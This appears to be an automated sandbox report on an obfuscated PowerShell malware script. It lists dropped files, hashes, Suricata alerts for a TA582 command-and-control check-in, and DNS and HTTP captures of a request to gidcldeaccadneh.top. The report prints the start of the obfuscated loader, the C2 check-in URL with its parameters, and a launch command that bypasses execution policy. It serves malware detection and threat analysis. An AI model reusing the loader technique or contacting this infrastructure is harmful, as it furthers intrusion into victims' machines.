                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):6222
                                                                                              Entropy (8bit):3.7338105921964457
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:DsdxZZrC5LZUUT8HukvhkvklCywy+DlfF5wxvYSogZoHFjlfF5wx6YSogZoHBA:QdZrCRGurkvhkvCCtllfFKnHOlfFKsHj
                                                                                              MD5:D94F766C5CE393E0E49EC2C315DA5879
                                                                                              SHA1:71C29F0765ECCFB6ED9C355BBC3F7634740B05E1
                                                                                              SHA-256:E0BEE123ADCEC117F283F9EF988B424926C803495D9632A5CEB3AABD23C1DA22
                                                                                              SHA-512:D046DA2A29B8B4330FABBE889B419E8725ECBB19205F0B0C5583EA566219D1A557B867DC7C4AD81DB2A96D31B8425757BE5AA773C3E5E0A3DB7E4720EFFB7B13
                                                                                              Malicious:false
                                                                                              Preview:...................................FL..................F.".. ...;.}.S.....^.97..z.:{.............................:..DG..Yr?.D..U..k0.&...&........{.S......97..q.b.97......t...CFSF..1....."S...AppData...t.Y^...H.g.3..(.....gVA.G..k...@......"S.oY7D....B......................A!.A.p.p.D.a.t.a...B.V.1.....oY<D..Roaming.@......"S.oY<D....D.....................%...R.o.a.m.i.n.g.....\.1.....6S.T..MICROS~1..D......"S.oY7D....E.......................(.M.i.c.r.o.s.o.f.t.....V.1.....oY6...Windows.@......"S.oY6.....F.........................W.i.n.d.o.w.s.......1....."SN...STARTM~1..n.......S)`oY1.....H...............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....6S.S..Programs..j.......S)`oY1.....I...............@.....f...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1....."S....WINDOW~1..V......"S.oY......J.......................O.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......"S.oYAD....i...........

                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\I51S3TBN3HPU5082YKCQ.temp

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):6222
                                                                                              Entropy (8bit):3.7338105921964457
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:DsdxZZrC5LZUUT8HukvhkvklCywy+DlfF5wxvYSogZoHFjlfF5wx6YSogZoHBA:QdZrCRGurkvhkvCCtllfFKnHOlfFKsHj
                                                                                              MD5:D94F766C5CE393E0E49EC2C315DA5879
                                                                                              SHA1:71C29F0765ECCFB6ED9C355BBC3F7634740B05E1
                                                                                              SHA-256:E0BEE123ADCEC117F283F9EF988B424926C803495D9632A5CEB3AABD23C1DA22
                                                                                              SHA-512:D046DA2A29B8B4330FABBE889B419E8725ECBB19205F0B0C5583EA566219D1A557B867DC7C4AD81DB2A96D31B8425757BE5AA773C3E5E0A3DB7E4720EFFB7B13
                                                                                              Malicious:false
                                                                                              Preview:...................................FL..................F.".. ...;.}.S.....^.97..z.:{.............................:..DG..Yr?.D..U..k0.&...&........{.S......97..q.b.97......t...CFSF..1....."S...AppData...t.Y^...H.g.3..(.....gVA.G..k...@......"S.oY7D....B......................A!.A.p.p.D.a.t.a...B.V.1.....oY<D..Roaming.@......"S.oY<D....D.....................%...R.o.a.m.i.n.g.....\.1.....6S.T..MICROS~1..D......"S.oY7D....E.......................(.M.i.c.r.o.s.o.f.t.....V.1.....oY6...Windows.@......"S.oY6.....F.........................W.i.n.d.o.w.s.......1....."SN...STARTM~1..n.......S)`oY1.....H...............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....6S.S..Programs..j.......S)`oY1.....I...............@.....f...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1....."S....WINDOW~1..V......"S.oY......J.......................O.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......"S.oYAD....i...........

                                                                                              Static File Info

                                                                                              General

                                                                                              File type:ASCII text, with very long lines (10864), with CRLF line terminators
                                                                                              Entropy (8bit):5.95377677495807
                                                                                              TrID:
                                                                                                File name:ryOpDCeOHz.ps1
                                                                                                File size:20'894 bytes
                                                                                                MD5:b551ce903d61eebc28085b06a85c9af1
                                                                                                SHA1:d7a8cfb2bff805e931f737d5031117d001d109a8
                                                                                                SHA256:6074c8778c3efd5bf30622cce9dbd59a86a82047b131fa08d45b2ced417b3e4f
                                                                                                SHA512:fba4911ad9a8d8daf44166718ed4dbf42b53cebf4959150ec589f392d2909c568e42f79c240807d8d46ae66673bfc8e65b79bbbda5d17d1a662fef85d5e3131a
                                                                                                SSDEEP:384:DUi9JFgdEUr8lOLvGWzWJJSpCgZ1InbKKuRNkHKn9UDpVcl:DUi3idx+OLRL1GbKK+3+1e
                                                                                                TLSH:F9927DA2A78CF5E21AD9CB7E6716EC44BF51647EC85EABC1F19AD4813391600ED48CC1
                                                                                                File Content Preview:$bqvatrmylwnpsf=$executioncontext;$tionenrearisonesesenonintionalered = ([CHaR[]]@((6446-6393),(-7405+7457),(563673/(3876488/(1530-1138))),(-9901+9951),(288288/5148),(8619-(43972710/5134)),(390-334),(9336-(17436-(10185595/(7702-(16072-(19298-(15465-5786))

                                                                                                File Icon

                                                                                                Icon Hash:3270d6baae77db44

                                                                                                Network Behavior

                                                                                                Suricata IDS Alerts

                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                2024-11-15T09:34:05.698762+01002859003ETPRO MALWARE TA582 Domain in DNS Lookup1192.168.11.20608891.1.1.153UDP
                                                                                                2024-11-15T09:34:06.667360+01002856654ETPRO MALWARE TA582 CnC Checkin1192.168.11.2049739206.188.196.3780TCP

                                                                                                Network Port Distribution

                                                                                                TCP Packets

                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Nov 15, 2024 09:34:05.879750013 CET4973980192.168.11.20206.188.196.37
                                                                                                Nov 15, 2024 09:34:06.088520050 CET8049739206.188.196.37192.168.11.20
                                                                                                Nov 15, 2024 09:34:06.088756084 CET4973980192.168.11.20206.188.196.37
                                                                                                Nov 15, 2024 09:34:06.091667891 CET4973980192.168.11.20206.188.196.37
                                                                                                Nov 15, 2024 09:34:06.300322056 CET8049739206.188.196.37192.168.11.20
                                                                                                Nov 15, 2024 09:34:06.617750883 CET8049739206.188.196.37192.168.11.20
                                                                                                Nov 15, 2024 09:34:06.667360067 CET4973980192.168.11.20206.188.196.37
                                                                                                Nov 15, 2024 09:34:06.739896059 CET4974080192.168.11.2064.233.185.105
                                                                                                Nov 15, 2024 09:34:06.858067036 CET804974064.233.185.105192.168.11.20
                                                                                                Nov 15, 2024 09:34:06.858266115 CET4974080192.168.11.2064.233.185.105
                                                                                                Nov 15, 2024 09:34:06.858390093 CET4974080192.168.11.2064.233.185.105
                                                                                                Nov 15, 2024 09:34:06.976313114 CET804974064.233.185.105192.168.11.20
                                                                                                Nov 15, 2024 09:34:07.037514925 CET804974064.233.185.105192.168.11.20
                                                                                                Nov 15, 2024 09:34:07.037592888 CET804974064.233.185.105192.168.11.20
                                                                                                Nov 15, 2024 09:34:07.037653923 CET804974064.233.185.105192.168.11.20
                                                                                                Nov 15, 2024 09:34:07.037708998 CET804974064.233.185.105192.168.11.20
                                                                                                Nov 15, 2024 09:34:07.037754059 CET804974064.233.185.105192.168.11.20
                                                                                                Nov 15, 2024 09:34:07.037796021 CET804974064.233.185.105192.168.11.20
                                                                                                Nov 15, 2024 09:34:07.037820101 CET4974080192.168.11.2064.233.185.105
                                                                                                Nov 15, 2024 09:34:07.037836075 CET804974064.233.185.105192.168.11.20
                                                                                                Nov 15, 2024 09:34:07.037889004 CET4974080192.168.11.2064.233.185.105
                                                                                                Nov 15, 2024 09:34:07.037892103 CET804974064.233.185.105192.168.11.20
                                                                                                Nov 15, 2024 09:34:07.037935972 CET804974064.233.185.105192.168.11.20
                                                                                                Nov 15, 2024 09:34:07.037981033 CET804974064.233.185.105192.168.11.20
                                                                                                Nov 15, 2024 09:34:07.038034916 CET4974080192.168.11.2064.233.185.105
                                                                                                Nov 15, 2024 09:34:07.038182974 CET4974080192.168.11.2064.233.185.105
                                                                                                Nov 15, 2024 09:34:07.038229942 CET4974080192.168.11.2064.233.185.105
                                                                                                Nov 15, 2024 09:34:07.155905962 CET804974064.233.185.105192.168.11.20
                                                                                                Nov 15, 2024 09:34:07.156198025 CET804974064.233.185.105192.168.11.20
                                                                                                Nov 15, 2024 09:34:07.156497002 CET4974080192.168.11.2064.233.185.105
                                                                                                Nov 15, 2024 09:34:07.160235882 CET804974064.233.185.105192.168.11.20
                                                                                                Nov 15, 2024 09:34:07.160311937 CET804974064.233.185.105192.168.11.20
                                                                                                Nov 15, 2024 09:34:07.160514116 CET4974080192.168.11.2064.233.185.105
                                                                                                Nov 15, 2024 09:34:07.168817997 CET804974064.233.185.105192.168.11.20
                                                                                                Nov 15, 2024 09:34:07.168890953 CET804974064.233.185.105192.168.11.20
                                                                                                Nov 15, 2024 09:34:07.169091940 CET4974080192.168.11.2064.233.185.105
                                                                                                Nov 15, 2024 09:34:07.177642107 CET804974064.233.185.105192.168.11.20
                                                                                                Nov 15, 2024 09:34:07.177716970 CET804974064.233.185.105192.168.11.20
                                                                                                Nov 15, 2024 09:34:07.177918911 CET4974080192.168.11.2064.233.185.105
                                                                                                Nov 15, 2024 09:34:07.186471939 CET804974064.233.185.105192.168.11.20
                                                                                                Nov 15, 2024 09:34:07.186542034 CET804974064.233.185.105192.168.11.20
                                                                                                Nov 15, 2024 09:34:07.186844110 CET4974080192.168.11.2064.233.185.105
                                                                                                Nov 15, 2024 09:34:07.194843054 CET804974064.233.185.105192.168.11.20
                                                                                                Nov 15, 2024 09:34:07.194931984 CET804974064.233.185.105192.168.11.20
                                                                                                Nov 15, 2024 09:34:07.195265055 CET4974080192.168.11.2064.233.185.105
                                                                                                Nov 15, 2024 09:34:07.203295946 CET804974064.233.185.105192.168.11.20
                                                                                                Nov 15, 2024 09:34:07.203372955 CET804974064.233.185.105192.168.11.20
                                                                                                Nov 15, 2024 09:34:07.203654051 CET4974080192.168.11.2064.233.185.105
                                                                                                Nov 15, 2024 09:34:07.211782932 CET804974064.233.185.105192.168.11.20
                                                                                                Nov 15, 2024 09:34:07.211857080 CET804974064.233.185.105192.168.11.20
                                                                                                Nov 15, 2024 09:34:07.212122917 CET4974080192.168.11.2064.233.185.105
                                                                                                Nov 15, 2024 09:34:07.220344067 CET804974064.233.185.105192.168.11.20
                                                                                                Nov 15, 2024 09:34:07.220468998 CET804974064.233.185.105192.168.11.20
                                                                                                Nov 15, 2024 09:34:07.220706940 CET4974080192.168.11.2064.233.185.105
                                                                                                Nov 15, 2024 09:34:07.228941917 CET804974064.233.185.105192.168.11.20
                                                                                                Nov 15, 2024 09:34:07.229044914 CET804974064.233.185.105192.168.11.20
                                                                                                Nov 15, 2024 09:34:07.229259968 CET4974080192.168.11.2064.233.185.105
                                                                                                Nov 15, 2024 09:34:07.274869919 CET804974064.233.185.105192.168.11.20
                                                                                                Nov 15, 2024 09:34:07.274964094 CET804974064.233.185.105192.168.11.20
                                                                                                Nov 15, 2024 09:34:07.275266886 CET4974080192.168.11.2064.233.185.105
                                                                                                Nov 15, 2024 09:34:07.279148102 CET804974064.233.185.105192.168.11.20
                                                                                                Nov 15, 2024 09:34:07.279256105 CET804974064.233.185.105192.168.11.20
                                                                                                Nov 15, 2024 09:34:07.279443026 CET4974080192.168.11.2064.233.185.105
                                                                                                Nov 15, 2024 09:34:07.287775040 CET804974064.233.185.105192.168.11.20
                                                                                                Nov 15, 2024 09:34:07.287925005 CET804974064.233.185.105192.168.11.20
                                                                                                Nov 15, 2024 09:34:07.288162947 CET4974080192.168.11.2064.233.185.105
                                                                                                Nov 15, 2024 09:34:07.295258999 CET804974064.233.185.105192.168.11.20
                                                                                                Nov 15, 2024 09:34:07.295269012 CET804974064.233.185.105192.168.11.20
                                                                                                Nov 15, 2024 09:34:07.295547009 CET4974080192.168.11.2064.233.185.105
                                                                                                Nov 15, 2024 09:34:07.302970886 CET804974064.233.185.105192.168.11.20
                                                                                                Nov 15, 2024 09:34:07.302980900 CET804974064.233.185.105192.168.11.20
                                                                                                Nov 15, 2024 09:34:07.303191900 CET4974080192.168.11.2064.233.185.105
                                                                                                Nov 15, 2024 09:34:07.310480118 CET804974064.233.185.105192.168.11.20
                                                                                                Nov 15, 2024 09:34:07.310492992 CET804974064.233.185.105192.168.11.20
                                                                                                Nov 15, 2024 09:34:07.310986996 CET4974080192.168.11.2064.233.185.105
                                                                                                Nov 15, 2024 09:34:07.317635059 CET804974064.233.185.105192.168.11.20
                                                                                                Nov 15, 2024 09:34:07.317711115 CET804974064.233.185.105192.168.11.20
                                                                                                Nov 15, 2024 09:34:07.317961931 CET4974080192.168.11.2064.233.185.105
                                                                                                Nov 15, 2024 09:34:07.325253963 CET804974064.233.185.105192.168.11.20
                                                                                                Nov 15, 2024 09:34:07.325264931 CET804974064.233.185.105192.168.11.20
                                                                                                Nov 15, 2024 09:34:07.325436115 CET4974080192.168.11.2064.233.185.105
                                                                                                Nov 15, 2024 09:34:07.540385008 CET4973980192.168.11.20206.188.196.37
                                                                                                Nov 15, 2024 09:34:07.541013956 CET4974080192.168.11.2064.233.185.105

                                                                                                UDP Packets

                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Nov 15, 2024 09:34:05.698761940 CET6088953192.168.11.201.1.1.1
                                                                                                Nov 15, 2024 09:34:05.870853901 CET53608891.1.1.1192.168.11.20
                                                                                                Nov 15, 2024 09:34:06.620022058 CET5900353192.168.11.201.1.1.1
                                                                                                Nov 15, 2024 09:34:06.737962008 CET53590031.1.1.1192.168.11.20

                                                                                                DNS Queries

                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                Nov 15, 2024 09:34:05.698761940 CET192.168.11.201.1.1.10xae6aStandard query (0)gidcldeaccadneh.topA (IP address)IN (0x0001)false
                                                                                                Nov 15, 2024 09:34:06.620022058 CET192.168.11.201.1.1.10x6a04Standard query (0)www.google.comA (IP address)IN (0x0001)false

                                                                                                DNS Answers

                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                Nov 15, 2024 09:34:05.870853901 CET1.1.1.1192.168.11.200xae6aNo error (0)gidcldeaccadneh.top206.188.196.37A (IP address)IN (0x0001)false
                                                                                                Nov 15, 2024 09:34:06.737962008 CET1.1.1.1192.168.11.200x6a04No error (0)www.google.com64.233.185.105A (IP address)IN (0x0001)false
                                                                                                Nov 15, 2024 09:34:06.737962008 CET1.1.1.1192.168.11.200x6a04No error (0)www.google.com64.233.185.99A (IP address)IN (0x0001)false
                                                                                                Nov 15, 2024 09:34:06.737962008 CET1.1.1.1192.168.11.200x6a04No error (0)www.google.com64.233.185.103A (IP address)IN (0x0001)false
                                                                                                Nov 15, 2024 09:34:06.737962008 CET1.1.1.1192.168.11.200x6a04No error (0)www.google.com64.233.185.147A (IP address)IN (0x0001)false
                                                                                                Nov 15, 2024 09:34:06.737962008 CET1.1.1.1192.168.11.200x6a04No error (0)www.google.com64.233.185.104A (IP address)IN (0x0001)false
                                                                                                Nov 15, 2024 09:34:06.737962008 CET1.1.1.1192.168.11.200x6a04No error (0)www.google.com64.233.185.106A (IP address)IN (0x0001)false

                                                                                                HTTP Request Dependency Graph

                                                                                                • gidcldeaccadneh.top
                                                                                                • www.google.com

                                                                                                HTTP Packets

                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                0192.168.11.2049739206.188.196.37807652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 15, 2024 09:34:06.091667891 CET219OUTGET /hqr7nx0sg1htr.php?id=computer&key=50024904669&s=mints13 HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                Host: gidcldeaccadneh.top
                                                                                                Connection: Keep-Alive
                                                                                                Nov 15, 2024 09:34:06.617750883 CET166INHTTP/1.1 302 Found
                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                Date: Fri, 15 Nov 2024 08:34:06 GMT
                                                                                                Content-Length: 0
                                                                                                Connection: keep-alive
                                                                                                Location: http://www.google.com


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                1192.168.11.204974064.233.185.105807652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 15, 2024 09:34:06.858390093 CET159OUTGET / HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                Host: www.google.com
                                                                                                Connection: Keep-Alive
                                                                                                Nov 15, 2024 09:34:07.037514925 CET1289INHTTP/1.1 200 OK
                                                                                                Date: Fri, 15 Nov 2024 08:34:06 GMT
                                                                                                Expires: -1
                                                                                                Cache-Control: private, max-age=0
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-0R-C7sZCkPi1LmJwjS5WOQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                Server: gws
                                                                                                X-XSS-Protection: 0
                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                Set-Cookie: AEC=AZ6Zc-UbGArOsl08lQHdfddMSsPgPrRcNOi0e8ymjDubfqLv0xidzxt8ig; expires=Wed, 14-May-2025 08:34:06 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                Set-Cookie: NID=519=Mm0GYdu21q-GsF6uJm_Cj1gcAuQKg8gEnU11z7ruKYHP1OSizNbpKBO543xXG13heolsxRdbk36q9zZpa-KUc1QdtM6hTbF6KKCO2SKw8fAExto_HhZaKyEuWfEe_HDLo_m-04T6eN5q-OSv2qq9o-90uwdHKYiYqp1kaBjlH6T0f5BycX6DtZxWXO-fBPWKWQvfYN7x; expires=Sat, 17-May-2025 08:34:06 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                Accept-Ranges: none
                                                                                                Vary: Accept-Encoding
                                                                                                Transfer-Encoding: chunked
                                                                                                Data Raw: 34 35 65 62 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68
                                                                                                Data Ascii: 45eb<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images, videos and more. Google has many special features to h
                                                                                                Nov 15, 2024 09:34:07.037592888 CET1289INData Raw: 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e
                                                                                                Data Ascii: elp you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/logos/doodles/2024/celebrating-the-kayak-675365183711058
                                                                                                Nov 15, 2024 09:34:07.037653923 CET1289INData Raw: 35 35 36 2c 34 33 2c 31 33 2c 33 2c 31 2c 34 33 2c 32 2c 34 2c 31 2c 36 2c 35 2c 34 37 2c 31 2c 35 2c 34 2c 31 2c 36 2c 31 2c 36 2c 31 2c 36 2c 31 2c 38 2c 31 2c 36 2c 35 2c 32 2c 31 2c 34 35 2c 31 30 2c 31 2c 31 2c 31 2c 31 2c 31 2c 31 2c 32 37
                                                                                                Data Ascii: 556,43,13,3,1,43,2,4,1,6,5,47,1,5,4,1,6,1,6,1,6,1,8,1,6,5,2,1,45,10,1,1,1,1,1,1,27995704,2169859,23034775,2739,4636,16436,49022,35023,11640,7668,6,3308,885,14280,8181,5934,43496,19011,2663,3431,3319,1906,2,21971,9139,4599,328,4456,1769,1116,56
                                                                                                Nov 15, 2024 09:34:07.037708998 CET1289INData Raw: 32 33 31 2c 37 31 37 31 30 36 33 27 2c 6b 42 4c 3a 27 5a 56 42 34 27 2c 6b 4f 50 49 3a 38 39 39 37 38 34 34 39 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3b 28 28 61 3d 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 29 3d 3d 6e 75 6c 6c 3f
                                                                                                Data Ascii: 231,7171063',kBL:'ZVB4',kOPI:89978449};(function(){var a;((a=window.google)==null?0:a.stvsc)?google.kEI=_g.kEI:window.google=_g;}).call(this);})();(function(){google.sn='webhp';google.kHL='en';})();(function(){var h=this||self;function l(){re
                                                                                                Nov 15, 2024 09:34:07.037754059 CET1289INData Raw: 3d 6e 65 77 20 49 6d 61 67 65 3b 76 61 72 20 67 3d 6e 2e 6c 65 6e 67 74 68 3b 6e 5b 67 5d 3d 61 3b 61 2e 6f 6e 65 72 72 6f 72 3d 61 2e 6f 6e 6c 6f 61 64 3d 61 2e 6f 6e 61 62 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 64 65 6c 65 74 65 20 6e 5b
                                                                                                Data Ascii: =new Image;var g=n.length;n[g]=a;a.onerror=a.onload=a.onabort=function(){delete n[g]};a.src=c}};google.logUrl=function(a,b){b=b===void 0?l:b;return t("",a,b)};}).call(this);(function(){google.y={};google.sy=[];var d;(d=google).x||(d.x=function
                                                                                                Nov 15, 2024 09:34:07.037796021 CET1289INData Raw: 29 3b 7d 29 2e 63 61 6c 6c 28 74 68 69 73 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 74 79 6c 65 3e 23 67 62 7b 66 6f 6e 74 3a 31 33 70 78 2f 32 37 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 68 65 69 67 68 74 3a 33 30 70 78 7d 23 67
                                                                                                Data Ascii: );}).call(this);</script><style>#gb{font:13px/27px Arial,sans-serif;height:30px}#gbz,#gbg{position:absolute;white-space:nowrap;top:0;height:30px;z-index:1000}#gbz{left:0;padding-left:4px}#gbg{right:0;padding-right:5px}#gbs{background:transpare
                                                                                                Nov 15, 2024 09:34:07.037836075 CET1289INData Raw: 7d 2e 67 62 78 6d 73 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 63 63 63 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 7a 2d 69 6e 64 65 78 3a 31 3b 74 6f 70 3a 2d 31 70 78 3b 6c
                                                                                                Data Ascii: }.gbxms{background-color:#ccc;display:block;position:absolute;z-index:1;top:-1px;left:-2px;right:-2px;bottom:-2px;opacity:.4;-moz-border-radius:3px;filter:progid:DXImageTransform.Microsoft.Blur(pixelradius=5);*opacity:1;*top:-2px;*left:-5px;*r
                                                                                                Nov 15, 2024 09:34:07.037892103 CET1289INData Raw: 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 7d 2e 67 62 74 73 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69
                                                                                                Data Ascii: play:inline-block;padding:0 5px;position:relative;z-index:1000}.gbts{*display:inline}.gbzt .gbts{display:inline;zoom:1}.gbto .gbts{background:#fff;border-color:#bebebe;color:#36c;padding-bottom:1px;padding-top:2px}.gbz0l .gbts{color:#fff;font-
                                                                                                Nov 15, 2024 09:34:07.037935972 CET1289INData Raw: 34 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 31 70 78 3b 77 69 64 74 68 3a 32 34 70 78 7d 2e 67 62 74 6f 20 23 67 62 69 34 69 2c 2e 67 62 74 6f 20 23 67 62 69 34 69 64 7b 74 6f 70 3a 33 70 78 7d 2e 67 62 69 34 70
                                                                                                Data Ascii: 4px;position:absolute;top:1px;width:24px}.gbto #gbi4i,.gbto #gbi4id{top:3px}.gbi4p{display:block;width:24px}#gbi4id{background-position:-44px -101px}#gbmpid{background-position:0 0}#gbmpi,#gbmpid{border:none;display:inline-block;height:48px;wi
                                                                                                Nov 15, 2024 09:34:07.037981033 CET1289INData Raw: 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 67 62 6d 6c 62 2c 2e 67 62 6d 6c 62 3a 76 69 73 69 74 65 64 7b 6c 69 6e 65 2d 68 65 69
                                                                                                Data Ascii: isplay:inline;margin:0;padding:0;white-space:nowrap}.gbmlb,.gbmlb:visited{line-height:27px}.gbmlb-hvr,.gbmlb:focus{outline:none;text-decoration:underline !important}.gbmlbw{color:#ccc;margin:0 10px}.gbmt{padding:0 20px}.gbmt:hover,.gbmt:focus{
                                                                                                Nov 15, 2024 09:34:07.155905962 CET1289INData Raw: 63 6b 3b 6d 61 72 67 69 6e 3a 30 20 32 30 70 78 7d 23 67 62 6d 70 6c 70 2e 67 62 70 73 7b 6d 61 72 67 69 6e 3a 30 20 31 30 70 78 7d 2e 67 62 70 63 20 2e 67 62 70 73 7b 63 6f 6c 6f 72 3a 23 30 30 30 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c
                                                                                                Data Ascii: ck;margin:0 20px}#gbmplp.gbps{margin:0 10px}.gbpc .gbps{color:#000;font-weight:bold}.gbpc .gbpd{margin-bottom:5px}.gbpd .gbmt,.gbpd .gbps{color:#666 !important}.gbpd .gbmt{opacity:.4;filter:alpha(opacity=40)}.gbps2{color:#666;display:block}.gb


                                                                                                Statistics

                                                                                                CPU Usage

                                                                                                Click to jump to process

                                                                                                Memory Usage

                                                                                                Click to jump to process

                                                                                                High Level Behavior Distribution

                                                                                                Click to dive into process behavior distribution

                                                                                                Behavior

                                                                                                Click to jump to process

                                                                                                System Behavior

                                                                                                General

                                                                                                Target ID:0
                                                                                                Start time:03:34:01
                                                                                                Start date:15/11/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ryOpDCeOHz.ps1"
                                                                                                Imagebase:0x7ff6c3980000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:1
                                                                                                Start time:03:34:01
                                                                                                Start date:15/11/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
